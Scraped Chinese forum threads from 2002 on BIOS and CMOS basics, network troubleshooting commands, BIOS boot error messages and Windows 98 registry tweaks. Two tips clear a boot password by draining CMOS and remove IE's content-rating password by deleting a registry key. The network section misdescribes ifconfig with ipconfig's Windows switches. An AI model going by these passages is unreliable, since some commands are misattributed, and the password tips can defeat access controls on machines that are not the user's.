 发表于 2002-03-06 07:43:56 按此观看继续努力的个人资料 按此发邮件给继续努力 访问继续努力的主页 继续努力 的 oicq 是88300297,查看 88300297 的资料 收藏该主题供以后查看 发送悄悄话给继续努力 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看继续努力的IP
BIOS详解

对于不少新手，刷新BIOS还是比较神秘的。而对于一些BIOS相关的知识，不少人也是一知半解。在这里，我们将对BIOS作一次全面的了解。
1、什么是BIOS

BIOS是英文"Basic Input Output System"的缩略语，直译过来后中文名称就是"基本输入输出系统"。它的全称应该是ROM－BIOS，意思是只读存储器基本输入输出系统。其实，它是一组固化到计算机内主板上一个ROM芯片上的程序，它保存着计算机最重要的基本输入输出的程序、系统设置信息、开机上电自检程序和系统启动自举程序。有人认为既然BIOS是"程序"，那它就应该是属于软件，感觉就像自己常用的Word或Excel。但也很多人不这么认为，因为它与一般的软件还是有一些区别，而且它与硬件的联系也是相当地紧密。形象地说，BIOS应该是连接软件程序与硬件设备的一座"桥梁"，负责解决硬件的即时要求。一块主板性能优越与否，很大程度上就取决于BIOS程序的管理功能是否合理、先进。主板上的BIOS芯片或许是主板上唯一贴有标签的芯片，一般它是一块32针的双列直插式的集成电路，上面印有"BIOS"字样。586以前的BIOS多为可重写EPROM芯片，上面的标签起着保护BIOS内容的作用(紫外线照射会使EPROM内容丢失)，不能随便撕下。586以后的ROM BIOS多采用EEPROM(电可擦写只读ROM)，通过跳线开关和系统配带的驱动程序盘，可以对EEPROM进行重写，方便地实现BIOS升级。常见的BIOS芯片有Award、AMI、Phoenix、MR等，在芯片上都能见到厂商的标记。

2、BIOS的作用

BIOS的主要作用有以下几方面：

首先是自检及初始化程序:计算机电源接通后，系统将有一个对内部各个设备进行检查的过程，这是由一个通常称之为POST（Power On Self Test/上电自检）的程序来完成，这也是BIOS程序的一个功能。完整的自检包括了对CPU、640K基本内存、1M以上的扩展内存、ROM、主板、CMOS存贮器、串并口、显示卡、软硬盘子系统及键盘的测试。在自检过程中若发现问题，系统将给出提示信息或鸣笛警告。如果没有任何问题，完成自检后BIOS将按照系统CMOS设置中的启动顺序搜寻软、硬盘驱动器及CDROM、网络服务器等有效的启动驱动器 ，读入操作系统引导记录，然后将系统控制权交给引导记录，由引导记录完成系统的启动，你就可以放心地使用你的宝贝了。其次是硬件中断处理：计算机开机的时候，BIOS会告诉CPU等硬件设备的中断号，当你操作时输入了使用某个硬件的命令后，它就会根据中断号使用相应的硬件来完成命令的工作，最后根据其中断号跳会原来的状态。再有就是程序服务请求：从BIOS的定义可以知道它总是和计算机的输入输出设备打交道，它通过最特定的数据端口发出指令，发送或接收各类外部设备的数据，从而实现软件应用程序对硬件的操作。

3、BIOS与CMOS

不少朋友混淆了BIOS与CMOS的概念，这里就跟大家说说CMOS及其与BIOS的关系：

CMOS是"Complementary Metal Oxide Semiconductor"的缩写，翻译出来的本意是互补金属氧化物半导体存储器，指一种大规模应用于集成电路芯片制造的原料。但在这里CMOS的准确含义是指目前绝大多数计算机中都使用的一种用电池供电的可读写的RAM芯片。而BIOS的意义我们在前面已经解释过了。那么，CMOS与BIOS到底有什么关系呢？CMOS是存储芯片，当然是属于硬件，它的作用是具有数据保存功能，但它也只能起到存储的作用，而不能对存储于其中的数据进行设置，要对CMOS中各项参数的设置就要通过专门的设置程序。现在多数厂家将CMOS的参数设置程序做到了BIOS芯片中，在计算机打开电源时按特殊的按键进入设置程序就可以方便地对系统进行设置。也就是说BIOS中的系统设置程序是完成CMOS参数设置的手段，而CMOS RAM是存放设置好的数据的场所，它们都与计算机的系统参数设置有很大关系。正因如此，便有?quot;CMOS设置"和"BIOS设置"两种说法，其实，准确的说法应该是"通过BIOS设置程序来对CMOS参数进行设置"。BIOS和CMOS是既相关联又有区别，"CMOS设置"和"BIOS设置"只是大家对设置过程简化的两种叫法，在这种意义上它们指的都是一会事。

CMOS存储芯片可以由主板的电池供电，即使系统掉电，存储的数据也不会丢失。但如果拿掉电池会出现什么情况呢？问得好！如果电池没有电，或是突然接触出了问题，或是你把他取下来了，那么CMOS就会因为断电而丢掉内部存储的所有数据。只不过若真有这种情况发生的话也不是什么大问题，你可以换电池，或是检查接触不良的原因，总之保证CMOS有电。再开机进入BIOS程序，选择主菜单中的"LOAD BIOS DEFAULTS"或是"LOAD SETUP DEFAULTS"后回车，最后再确定输入"Y"回车即可。大家也许曾听其他玩家谈到过若忘记了开机密码就给CMOS放电的说法，其实也就是把包括密码在内的信息全丢掉，开机时就不需要输入密码了，再来重新写入数据。

朝为田舍郎，暮登风子堂。
将相本无种，男儿当自强。
一块两毛五

初级用户
积分：150
发帖：41
来自：
注册：2002-03-18
 发表于 2002-03-30 10:38:42 按此观看一块两毛五的个人资料 按此发邮件给一块两毛五 发送悄悄话给一块两毛五 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看一块两毛五的IP
这回我彻底理解了
cgang580925

高级用户
积分：170
发帖：43
来自：沪
注册：2002-03-09
 发表于 2002-03-31 22:08:47 按此观看cgang580925的个人资料 按此发邮件给cgang580925 发送悄悄话给cgang580925 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看cgang580925的IP
能不能提供“bios”的升级方法。
自在

终级用户
积分：1179
发帖：322
来自：京·北
注册：2002-03-04
 发表于 2002-03-31 22:38:03 按此观看自在的个人资料 按此发邮件给自在 自在 的 oicq 是1292510,查看 1292510 的资料 发送悄悄话给自在 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看自在的IP
http://www.google.com/search?q=%C9%FD%BC%B6bios&hl=zh-CN&lr=

修 身　·　齐 家　·　治 业　·　平 天 下
wellcome to visit our BBS　BLUELUNIX
fanbl

终级用户
积分：2408
发帖：652
来自：
注册：2002-03-20
 发表于 2002-03-31 23:26:32 按此观看fanbl的个人资料 按此发邮件给fanbl 访问fanbl的主页 发送悄悄话给fanbl 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看fanbl的IP
不错，又学到点东西！

我是菜鸟请多关照
上一贴 | 下一贴
快速回复 主题：BIOS详解
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


用网络命令来检验网络故障！ - 经 典 论 坛

计算机技术
用网络命令来检验网络故障！

上一贴 | 下一贴
发表人 主题: 用网络命令来检验网络故障！
onlysnake

终级用户
积分：2127
发帖：739
来自：经典_流氓屯
注册：2002-01-10
 发表于 2002-03-05 22:42:10 按此观看onlysnake的个人资料 按此发邮件给onlysnake onlysnake 的 oicq 是24394523,查看 24394523 的资料 收藏该主题供以后查看 发送悄悄话给onlysnake 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看onlysnake的IP
要维持局域网的正常工作，首先要维持网络的安全运行。因此，时刻保持警惕，在网络出现问题的时候迅速加以解决是十分重要的。在这篇文章里，笔者介绍了他在使用网络命令来诊断网络故障中的心得体验，值得局域网维护人员和网络发烧友一读。

    1、netstat命令

    netstat程序有助于我们了解网络的整体使用情况。它可以显示当前正在活动的网络连接的详细信息，例如显示网络连接、路由表和网络接口信息，可以让用户得知目前总共有哪些网络连接正在运行。我们可以使用netstat／？命令来查看一下该命令的使用格式以及详细的参数说明，该命令的使用格式是在ＤＯＳ命令提示符下或者直接在运行对话框中键入如下命令：netstat［参数］，利用该程序提供的参数功能，我们可以了解该命令的其他功能信息，例如显示以太网的统计信息、显示所有协议的使用状态，这些协议包括TCP协议、UDP协议以及IP协议等，另外还可以选择特定的协议并查看其具体使用信息，还能显示所有主机的端口号以及当前主机的详细路由信息。

    这里，对于lo0回送口的信息可以不管，但对于nat0实际网络的信息是有必要研究的。

    A、注意queue字段为零，没有不能传输的分组在等待，这是正常的。如果nat0口正在运行而有信息不能正常地传送到该网络，即queue字段不为零，就可怀疑通信电缆或网卡有问题。

    B、输入错(ierrs)和输出错(oerrs)应该接近为零，最好全为零，这说明通过该接口传送的信息无出错的分组，网络的接口无问题。但当这两个字段有100个以上的出错分组时就可以认为是高出错率了。高的输出错表示本地网络饱和或在主机与网络之间有不良的物理连接。高的输入错表示网络饱和、本地主机过载或物理连接有问题，可以用ping命令统计误码率，进一步确定故障的程度。

    C、在冲突字段(collis)中，如果引起冲突的输出分组的百分率太高，表示网络饱和，需要将网络分段来减少通信量的负载以根治故障。

    2、ping命令

    该命令主要是用来检查路由是否能够到达，由于该命令的包长非常小，所以在网上传递的速度非常快，可以快速的检测您要去的站点是否可达，一般您在去某一站点是可以先运行一下该命令看看该站点是否可达。如果执行Ping不成功，则可以预测故障出现在以下几个方面：网线是否连通，网络适配器配置是否正确，IP地址是否可用等;如果执行Ping成功而网络仍无法使用，那么问题很可能出在网络系统的软件配置方面，Ping成功只能保证当前主机与目的主机间存在一条连通的物理路径。它的使用格式是在命令提示符下键入：Ping　IP地址或主机名，执行结果显示响应时间，重复执行这个命令，你可以发现Ping报告的响应时间是不同的。具体的ping命令后还可跟好多参数，你可以键入ping后回车其中会有很详细的说明。

    A、网络管理员可对该用户的远程主机使用ping命令进行联机检查，如果成功，接着在用户端对远程主机执行ping命令，如果也成功，则说明这一网络故障很有可能是用户遇到故障的那个应用程序了。

    B、如果网络管理员的ping命令执行成功而用户的ping命令执行不成功，则故障原因很可能是用户端的网络系统配置文件有问题。

    C、如果网络管理员和用户的ping命令都失败了，这时可注意ping命令显示的出错信息，这种出错信息通常分为三种情况:

    （1）unknown host(不知名主机)，这种出错信息的意思是该远程主机的名字不能被命名服务器转换成ip地址。网络故障可能为命名服务器有故障，或者其名字不正确，或者网络管理员的系统与远程主机之间的通信线路有故障。

    （2）network unreachable(网络不能到达)，这是本地系统没有到达远程系统的路由，可用netstat-rn检查路由表来确定路由配置情况。

    （3）no answer(无响应)，远程系统没有响应。这种故障说明本地系统有一条到达远程主机的路由，但却接受不到它发给该远程主机的任何分组报文。这种故障可能是:远程主机没有工作，或者本地或远程主机网络配置不正确，或者本地或远程的路由器没有工作、或者通信线路有故障，或者远程主机存在路由选择问题。

    3、ifconfig命令

    ifconfig程序采用windows窗口的形式来显示ＩＰ协议的具体配置信息，如果ifconfig命令后面不跟任何参数直接运行，程序将会在窗口中显示网络适配器的物理地址、主机的IP地址、子网掩码以及默认网关等，还可以查看主机的相关信息如：主机名、DNS服务器、节点类型等。其中网络适配器的物理地址在检测网络错误时非常有用。在命令提示符下键入ifconfig／？可获得ifconfig的使用帮助，键入ifconfig／all可获得IP配置的所有属性。

    配置不正确的ip地址或子网掩码是接口配置的常见故障。其中配置不正确的ip地址有两种情况:

    （1）网号部分不正确，此时执行每一条ifconfig命令都会显示“no answer”，这样，执行该命令后错误的ip地址就能被发现，修改即可。

    （2）主机部分不正确，比如与另一主机配置的地址相同而引起冲突。这种故障只有当两台主机同时工作时才会出现间歇性的通信问题，建议更换ip地址中的主机号部分，该问题即能排除。

    当主机系统能到达远程主机但不能到达本地子网中的其他主机时，这表示子网掩码设置有问题，进行修改后故障便不会再出现。
￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥￥

我觉得很有用的！！

我在天空写下你的名字，但是被风带走了；我在沙滩写下你的名字，但是被浪花带走了；于是，我在大街上的每个角落写下你的名字，…………·#！￥%—*+但是，我被警察带走了！！

Blueidea Counter Strike Team
=Blueidea=onlysnake

F鹰

超级用户
积分：313
发帖：94
来自：
注册：2002-02-27
 发表于 2002-03-07 17:37:28 按此观看F鹰的个人资料 按此发邮件给F鹰 F鹰 的 oicq 是105454121,查看 105454121 的资料 发送悄悄话给F鹰 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看F鹰的IP
还有TRACERT跟踪

=BULEIDEA=SOS
上一贴 | 下一贴
快速回复 主题：用网络命令来检验网络故障！
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]
显示签名 禁止笑脸转换

管理选项： 关闭主题 | 置于顶部 | 移动/归档 | 删除主题

跳转到:

dreamweaver MX 功能探索


开机BIOS语言一点通 - 经 典 论 坛

计算机技术
开机BIOS语言一点通

上一贴 | 下一贴
发表人 主题: 开机BIOS语言一点通
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-06-20 20:15:46 按此观看啸的个人资料 按此发邮件给啸 收藏该主题供以后查看 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
就当作积累点资料吧，可能对以后修复会有用。

引自： http://www.szonline.net/tech/market/tech_market_20020530_4.html

开机BIOS语言一点通

萧木 2002/05/30

开机自检时出现问题后会出现各种各样的英文短句，短句中包含了非常重要的信息，读懂这些信息可以自己解决一些小问题，可是这些英文难倒了一部分朋友，下面是一些常见的BIOS短句的解释，大家可以参考一下。

1.CMOS battery failed

中文：CMOS电池失效。

解释：这说明CMOS电池已经快没电了，只要更换新的电池即可。

2.CMOS check sum error－Defaults loaded

中文：CMOS 执行全部检查时发现错误，要载入系统预设值。

解释：一般来说出现这句话都是说电池快没电了，可以先换个电池试试，如果问题还是没有解决，那么说明CMOS RAM可能有问题，如果没过一年就到经销商处换一块主板，过了一年就让经销商送回生产厂家修一下吧！

3.Press ESC to skip memory test

中文：正在进行内存检查，可按ESC键跳过。

解释：这是因为在CMOS内没有设定跳过存储器的第二、三、四次测试，开机就会执行四次内存测试，当然你也可以按 ESC 键结束内存检查，不过每次都要这样太麻烦了，你可以进入COMS设置后选择BIOS FEATURS SETUP，将其中的Quick Power On Self Test设为Enabled，储存后重新启动即可。

4.Keyboard error or no keyboard present

中文：键盘错误或者未接键盘。

解释：检查一下键盘的连线是否松动或者损坏。

5.Hard disk install failure

中文：硬盘安装失败。

解释：这是因为硬盘的电源线或数据线可能未接好或者硬盘跳线设置不当。你可以检查一下硬盘的各根连线是否插好，看看同一根数据线上的两个硬盘的跳线的设置是否一样，如果一样，只要将两个硬盘的跳线设置的不一样即可（一个设为Master，另一个设为Slave）。

6.Secondary slave hard fail

中文：检测从盘失败

解释：可能是CMOS设置不当，比如说没有从盘但在CMOS里设为有从盘，那么就会出现错误，这时可以进入COMS设置选择IDE HDD AUTO DETECTION进行硬盘自动侦测。也可能是硬盘的电源线、数据线可能未接好或者硬盘跳线设置不当，解决方法参照第5条。

7.Floppy Disk(s) fail 或 Floppy Disk(s) fail(80) 或Floppy Disk(s) fail(40)

中文：无法驱动软盘驱动器。

解释：系统提示找不到软驱，看看软驱的电源线和数据线有没有松动或者是接错，或者是把软驱放到另一台机子上试一试，如果这些都不行，那么只好再买一个了，好在软驱还不贵。

8.Hard disk(s) diagnosis fail

中文：执行硬盘诊断时发生错误。

解释：出现这个问题一般就是说硬盘本身出现故障了，你可以把硬盘放到另一台机子上试一试，如果问题还是没有解决，只能去修一下了。

9.Memory test fail

中文：内存检测失败。

解释：重新插拔一下内存条，看看是否能解决，出现这种问题一般是因为内存条互相不兼容,去换一条吧！

10.Override enable－Defaults loaded

中文：当前CMOS设定无法启动系统，载入BIOS中的预设值以便启动系统。

解释：一般是在COMS内的设定出现错误，只要进入COMS设置选择LOAD SETUP DEFAULTS载入系统原来的设定值然后重新启动即可。

11.Press TAB to show POST screen

中文：按TAB键可以切换屏幕显示。

解释：有的OEM厂商会以自己设计的显示画面来取代BIOS预设的开机显示画面，我们可以按TAB键来在BIOS预设的开机画面与厂商的自定义画面之间进行切换。

12.Resuming from disk，Press TAB to show POST screen

中文：从硬盘恢复开机，按TAB显示开机自检画面）。

解释：这是因为有的主板的BIOS提供了Suspend to disk(将硬盘挂起)的功能，如果我们用Suspend to disk的方式来关机，那么我们在下次开机时就会显示此提示消息。

13.Hareware Monitor found an error，enter POWER MANAGEMENT SETUP for details，Press F1 to continue，DEL to enter SETUP

中文：监视功能发现错误，进入POWER MANAGEMENT SETUP察看详细资料，按F1键继续开机程序，按DEL键进入COMS设置。

解释：有的主板具备硬件的监视功能，可以设定主板与CPU的温度监视、电压调整器的电压输出准位监视和对各个风扇转速的监视，当上述监视功能在开机时发觉有异常情况，那么便会出现上述这段话，这时可以进入COMS设置选择POWER MANAGEMENT SETUP，在右面的**Fan Monitor**、**Thermal Monitor**和**Voltage Monitor**察看是哪部分发出了异常，然后再加以解决。

宠辱不惊，坐看庭前花开花落；去留无意，任天上云卷云舒......

Blueidea Web Team.
Moderator Of Computer Technology Forum

gq118

弦月
积分：1161
发帖：1069
来自：Cd--UeSTC
注册：2000-07-03
 发表于 2002-06-20 22:46:46 按此观看gq118的个人资料 按此发邮件给gq118 访问gq118的主页 gq118 的 oicq 是9774743,查看 9774743 的资料 发送悄悄话给gq118 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看gq118的IP
一个字!
精!!

.....::::::有的野Wo!:)::::::.....
上一贴 | 下一贴
快速回复 主题：开机BIOS语言一点通
显示名字： 啸 [ 退出 ]
消息图标：

内容
* HTML 代码关闭
* UBB　代码开启
* 笑脸转换一点通

* html代码调试方法:
[html]……[/html]


Windows注册表应用的30个实例 - 经 典 论 坛

计算机技术
Windows注册表应用的30个实例

上一贴 | 下一贴
发表人 主题: Windows注册表应用的30个实例
啸

无意
现任版主
积分：6225
发帖：2154
来自：
注册：2000-08-01
 发表于 2002-06-14 11:53:16 按此观看啸的个人资料 按此发邮件给啸 收藏该主题供以后查看 发送悄悄话给啸 编辑/删除帖子 引用这个帖子回复 打分 将本帖子内容通过email打包下载 将本帖子内容输出到 ActiveContent 管理员查看啸的IP
引自： http://210.36.80.202/computer/sys/win98zcb/zhuce021.htm

Windows注册表应用的30个实例

作者：骆诚

    1．防止匿名用户登录

    虽然Windows可以为每个用户定制各自的使用界面并指定口令，但任何人都能通过点击登录窗口中的“取消”或按ESC键进入系统，即所谓匿名登录。下述方法可以防止匿名用户登录. 在HKEY_LOCAL_MACHINE\NetWork\Logon下新建DWORD类型“MustBeValidated”，其值为1。（附：如果自己都进不去了，可以以安全模式进入，然后将其值改为0。）注意：在对等网络下该方法不起作用。

    2．重排输入法

    您可以将所有输入法按自已的需要重新排序，比如把最常用的五笔输入法放在最前。依次展开HKEY_CURRENT_USER\Keyboard layout\Preload，在其下可以见到键名从数字1开始依次递增的多个子键名称，具体子键个数与系统已安装的输入法种数相一一对应。现假如要将子键名为“2”所对应的输入法与子键名为“5”所对应的输入法互换，即将子键名“5”所对应的输入法前移至第二位，方法如下. 右击子键“2”选“重命名”将子键“2”改名为“22”或其它不存在之名称，接着将子键“5”重命名为“2”，最后将子键“22”改名为“5”。

    3．屏蔽开始菜单功能

    您可以将所有输入法按自已的需要重新排序。在HKEY_CURRENT_USER\ Software\ Microsoft\Windows\ CurrentVersion\ Policies\ Explorer中新建三个DWORD值，名称分别为“NoRun”（屏蔽“运行”）、“NoFind”（屏蔽“查找“）、“NoClose“（屏蔽“关闭系统“），其值均设置为1，重启系统后执行“运行” 与“关闭系统”命令时提示操作受限制而取消，同时你会发现“开始”菜单中的“查找”选项没有了，要重新恢复其设置，可将对应的键删除或将键值置0即可。

    4．隐藏桌面所有图标

    找到子键HKEY_CURRENT_USER\ Software\ Microsoft\ Windows\ CurrentVersion\Policies\Explorer，新建DWORD值“NoDesktop”，其值为1。重启系统后，你会发现桌面已变得空荡荡一片。

    5．快速打开文件编辑

    也许你经常使用某个程序来打开文件进行编辑，而这些文件的扩展名是随意的，为了方便我们可以将这个程序加入到右键菜单中去。以写字板为例，在HKEY_CLASSES_ROOT\*下新建“shell“子键，在其下新建“wordpad“子键，双击该键右面窗口的 “默认”处并在“键值”栏内输入“写字板”，接着在“wordpad”子键下建立下一级子键“command”,在“默认”的 “键值“栏内输入“c:\program files\accessories\wordpad.exe %1”。不用重启系统，现在回到“我的电脑“或“资源管理器”中右键单击任意文件（当然是写字板能加载的，不管关联与否），选“写字板”即可快速打开文件进行编辑了。

    6．清除运行程序记录

    在“开始/运行”的“打开“窗口下拉菜单中保存了过去运行的记录，我们可以直接在注册表编辑器中删除它：在HKEY_USER\.Default\Software\Microsoft\Windows \CurrentVersion\Exploe r\RunMRU的右窗口中保存着这些操作，删掉不需要的串值即可。

    7．无法卸掉的程序

    我们有时会碰到这样的情况. 在控制面板的“添加/删除应用程序”中卸载某个应用程序之后，却发现该程序还是在列表中。这时可用下述方法将其从列表中删去. 打开注册表编辑器，进入目录“HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Uninstall”，根据所列出的注册文件删去与该应用对应的项即可。

    8．把Word插入对象名称改成汉字

    在WORD菜单插入/对象中的一个个英文名称往往令人难以适应，我们可以用个简单的方法把它改成汉字. 在注册表编辑器中，将HKEY_CLASSES_ROOT\Eqation 3.0右窗口键的“默认“值由“Microsoft Equation 3.0”改为“公式编辑器3.0”

    9．提高资源管理器刷新的速度

    当用户在“Windows资源管理器”中增加或者删除了一个文件夹后，虽可通过按F5键查看最新刷新的结果。但是，每次这样做势必十分麻烦。其实通过修改注册表可以使这种刷新达到完全自动化。具体方法是：打开HKEY_LOCAL_MACHINE\ System\ CurrentControlSet\ Control\ Update分支，在Update子键中包含一个UpdateMode键值名，其键值为01，双击UpdateMode，将01改为00即可。

    10．更改IE的安全口令

    您可以在IE的“Internet选项”对话框的“内容”选项页的“分级审查”框中设置口令，这样，在显示有ActiveX的页面时，总会出现“分级审查不允许查看”的提示信息，然后弹出口令对话框，要求您输入监护人口令。如果口令不对，则将停止浏览。但是，如果此口令遗忘了，则无法浏览这些特征的页面。在口令遗忘后，重装IE也无法去掉安全口令。这时只有求助于注册表了：打开HKEY_LOCAL_MACHINE\ SOFTWARE\ Microsoft\ Windows\ CurrentVersion\ Policies分支，在Policies子键下选择“Ratings”子键，按Del键将其删除，由于Ratings子键下的Key键值数据就是经过加密后的口令，删除了这一项，IE4.0自然就认为您没有设置口令了。

    11．删除开始菜单中的文档项

    我们知道，“开始”菜单中的“文档”菜单项记录了所有曾打开的文档。但是，在多人使用的机器中，为了保密起见，用户自己很不希望其他用户看到自己曾经编辑过的文档或其他信息。我们可以通过修改注册表编辑器来删除它们. 打开HKEY_CURRENT_USER\ Software\Microsoft\Windows\CurrentVersion\Policies\ Explorer，在右窗格中，用鼠标右击任意空白区域，然后从快捷菜单中选择“新建”中的“二进制值”，将“New Value#1“换名为“NoRecentDocsHistory”，接着右击“NoRecentDocsHistory”项，选择从快捷菜单中选择“修改”，然后在“键值”框中，键入“1”，最后单击“确定”按钮。在重启系统后，您会看到不仅“开始”菜单中的“文档”菜单项被删除掉了，而且用来存放“文档”菜单项内容的C:\Windows\Recent目录也被删除掉了。

    12．改变时间显示格式

    在通常情况下，Windows在任务栏中使用“23:12”的时间格式来显示时间，但是您可以通过修改注册表编辑器来更改此时间格式，其操作步骤如下.

    打开HKEY_CURRENT_USER\ControlPanel\International分支，在右窗格的空白处右击鼠标，从弹出的快捷菜单中选择“字符串值”，然后将“New Value#1”修改为“sTimeFormat”。双击“sTimeFormat”项，然后在如图16所示的对话框中将其“键值”修改为“HHmm“。重启计算机后，则您将看到在任务栏中显示的时间会显示为“2312”形式了。

    13．改变Word文档的日期显示

    当我们在Word文档中插入日期页眉或者页脚时，其日期的显示格式一般为. MM/DD/YY。但是，这不符合中国用户的显示习惯。我们希望将12/09/98改为1998/9/12，则通过修改注册表可以改变这种日期的显示方式，其操作步骤如下.

打开HKEY_CURRENT_USER\Software\Microsoft\Office\8.0\Word\Options 在右窗口中， 用鼠标右击任意空白区域，然后从快捷菜单中选择“新建”中的“字符串值”，接着将“New Value#1”换名为“DateFormat”。然后右击“DateFormat“项，选择从快捷菜单中选择“修改”，然后在“键值”框中，键入“yyyy.MM.DD“，最后单击“确定”。这样，在下次在Word中插入日期时，一定就是您所希望的“1998.09.12”的格式了。

    14．删除查找结果中的文件列表。

    使用“查找“功能可以很快地查找到所需要的文件，同时在“查找”对话框下半部给出文件列表。想删除它们可打开HKEY_CURRENT_USER\.Default\ SoftWare\ Microsoft\ Windows\ CurrentVersion\ Explorer\DocFind SpecMRU，在右窗格中除第一、二和最后一个不能删除外，将其它删除即可。

    15．在“我的电脑“中屏蔽磁盘图标

    在多用户的操作环境中，您可以为不同用户设置不同的磁盘驱动器图标，这样可以限制各种用户的操作权限。打开HKEY-CURRENT-USER\ Software\ Microsoft\ Windows\ CurrentVersion\ Policies\ Explorer分支，在此分支下NoDrives键值名为给不同用户设置不同的磁盘驱动器图标提供了方便，其缺省键值是0x00000000。NoDrives键值为四个字节，每个字节的每一位就对应于一个盘符（A. ～Z. ），即第一个字节代表了从A. 到H. 的八个盘，即01为A. 、02为B. 、04为C. …，80为H. 。依此类推，第二个字节代表I. 到P. ；第三个字节代表Q. 到X. ；第四个字节代表Y. 和Z. 。因此，当相应位为1时，则在打开“我的电脑”，就再也看不到对应的盘了。例如，我们要关闭C. 盘，只需右击NoDrives键值名，然后从快捷菜单中选“修改“，将其键值改为04000000；若要关闭D. 盘，就此键值改为08000000；若要关闭C. 和D. ，就将此键值改为0C000000。

    16．一些英文软件显示乱码

    打开HKEY_LOCAL_MACHINE\ System\ CurrentControlSet\ Control\ fontassoc\Associated CharSet 分支，将GB2312(86)的机内码改为no，重新启动Windows。

    17. 清理软件遗留注册字句信息

    即使是卸载软件时，注册表文件仍然会保留软件安装时注册的许多初始信息语句（如软件的供应商、ID号、用户及组织名、某些设置参数等），如果不及时作清理工作，长时间会使得注册表文件越来越庞大，影响到系统的工作性能。依次打开HEKY_CURRENT_USER、software主键，显示的下级主键项一般是软件的供应商名，如. 所有由微软提供的软件均含在Microsoft主键项中。对HEKY_CURRENT_MACHINE和HEKY_USERS中的Software主键项操作一样。通常根据已删软件的名字点击各项主键寻找，找到并确认后即可删除其配置项。

    18. 清理访问网络邻居后留下的字句信息

    使用局域网的用户在访问网络邻居时，注册表会HEKY_CURRENT_USER/Network/Recent主键项中记录下一系列命令操作的信息，包含被访问机器的名字、访问过的应用程序及文件名等，如. 主键Recent包含一名为\\ierl_server\software的子主键项，表示你曾访问过名为ierl_server的服务器中的software文件夹，点击此项后编辑器右窗显示此项的名称及键值。这些内容基本没有用途，可以适当的清理一下。打开注册表编辑器后，按以下顺序依次打开各级主键. HEKY_CURRENT_USER、Network、Recent, 然后把主键Recent 的子项删除即可。

    19. 为回收站改名

    我们可以很容易地改变桌面上大多数图标的名字但却不能直接给回收站改名。如果您想改变“回收站“的名子只有在注册 表编辑器中将HKY_CLASSES_ROOT\CLSID \ {645FF040-5081-101B-9F08-00AA002F954E}右窗口键的“默认”值由“回收站”改为其它的名字(如“垃圾筒”)，关闭注册表编辑器，重启WIN98。

    20. 改变我的电脑、回收站的图标

    在Win98中,不能象修改一般文件的图标那样来更改“我的电脑”、“回收站”的图标,只能通过修改系统的注册表来实现：启动注册表编辑器,在注册表中依次选择“HKEY_LOCAL_MACHINE\SOFTWARE\ Classes\ CLSID”选项,然后选择编辑\查找,键入“回收站“并确认。当找到该项后,选择该项的DefaultIcon选项,双击名称栏中的“Full”(或“Deafult”、“Empty”),在弹出的对话框中显示的是“回收站”所对应的图标文件,更改该值为您喜欢的图标文件(注意要写全文件路径)。用同样的方法可以修改“我的电脑“的图标,只要在查找时键入“我的电脑“并确认即可。

    21. 删除桌面上的系统级图标

    当你想删除桌面上的回收站、收件箱、网上邻居的图标时，就会发现它们不能用一般的方法删除。这时也只能修改注册表了. 打开注册表编辑器，先把HKEY_LOCAL_MACHINE\ SOFTWARE\ Mcrosoft\ Windows\ CurrentVersion\ Explorer\ Desktop\ NameSpace下分支的关键字和右窗口的串值(用纸笔)记下(供恢复时用)，然后删掉所不需要的分支，关闭注册表编辑器，重新启动WIN98，再看桌面，它已经消失了。

    22. 修改“长文件名的命名准则“

    Win98支持长文件名，它会为每个长文件名自动生成一个古老的8.3格式的短文件名。当长文件名超过了8个字母时，短文件名就会出现一个波浪号加上一个数字(这就是数字尾巴)。数字尾巴的作用是区分前8个字母相同的长文件名，但当某个长文件名的前8个字母唯一时，Win98也会给短文件名后面加上数字尾巴，这在逻辑上给人一种“多余”的感觉。其实这种“规则”也是可以改变的. 在注册表编辑器中打开HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\ FileSystem后，给FileSystem新建一个BinaryValue，命名为“NameNumericTail”，设定其值为0。重新启动机器后，Win98就会使(DOS下的)文件名尽可能接近长名，易于区别，又绝不相同。

    23. 为一台机器设置两个IP地址

    一般情况下只能为一个网络适配器配置一个IP地址，但通过修改系统注册表，却可以为一个网卡配置多个IP地址：运行注册表编辑器，找到HKEY_LOCAL_MACHINE\ System\ CurrentControlSet\ Services\Class\NetTrans，在此目录中可以看到多个名为0000、0001、0002…的目录，它们用于记录协议的安装情况。在它们中间找到DriverDesc为“TCP/IP”的目录，修改IPAddress和IPMask两个键。其中IPAddress为用逗号隔开的多个IP地址，IPMask是对应的掩码。例如设置IPAddress为“202.10.1.10，202.10.1.25”，IPMask为“255.255.255.0，255.255.255.0”时，表示为系统设置了两个IP地址202.10.1.10和202.10.1.25。

    24. 修改桌面和屏幕设置

    打开注册表编辑器，打开“我的电脑\HKEY_CURRENT_USER\ ControlPanel\ desktop”可以看到一些项目，介绍几个如下.

